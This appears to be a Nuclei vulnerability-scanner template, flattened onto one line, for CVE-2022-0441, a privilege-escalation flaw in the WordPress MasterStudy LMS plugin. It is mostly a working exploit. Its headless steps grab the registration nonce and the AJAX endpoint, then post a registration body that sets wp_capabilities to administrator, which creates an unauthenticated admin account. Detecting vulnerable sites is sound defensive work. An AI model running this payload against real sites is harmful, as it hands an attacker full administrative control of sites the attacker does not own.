id: CVE-2022-0441 info: name: WordPress MasterStudy LMS Plugin Privilege Escalation author: dwisiswant0 severity: critical description: | The MasterStudy LMS WordPress plugin before 2.7.6 does to validate some parameters given when registering a new account, allowing unauthenticated users to register as an admin. reference: - https://wpscan.com/vulnerability/173c2efe-ee9c-4539-852f-c242b4f728ed remediation: Upgrade to version >= 2.7.6. tags: cve,cve2022,wordpress,privx,headless variables: username: "{{to_lower(rand_text_alphanumeric(6))}}" password: "{{rand_text_alphanumeric(8)}}" headless: - steps: - action: navigate args: url: "{{BaseURL}}/" - action: waitload - action: script name: nonce code: "stm_lms_nonces.stm_lms_register" - action: script name: endpoint code: "stm_lms_ajaxurl" - action: setmethod args: part: request method: POST - action: setheader args: part: request key: X-Requested-With - action: setheader args: part: request key: application/json - action: setbody args: part: request body: | { "user_login": "{{username}}", "user_email": "{{username}}@{{to_lower(rand_text_alphanumeric(6))}}.com", "user_password": "{{password}}", "user_password_re": "{{password}}", "become_instructor": "", "privacy_policy": true, "degree": "", "expertize": "", "auditory": "", "additional": [], "additional_instructors": [], "profile_default_fields_for_register": { "wp_capabilities": { "value": { "administrator": 1 } } } } - action: navigate name: register args: url: "{{endpoint}}?action=stm_lms_register&nonce={{nonce}}" - action: waitload - action: script name: status code: "status" # extract JSON object response matchers-condition: and matchers: - type: regex part: nonce regex: - "^[a-f0-9]+" - type: word part: endpoint words: - "admin-ajax.php" - type: word part: status words: - "success"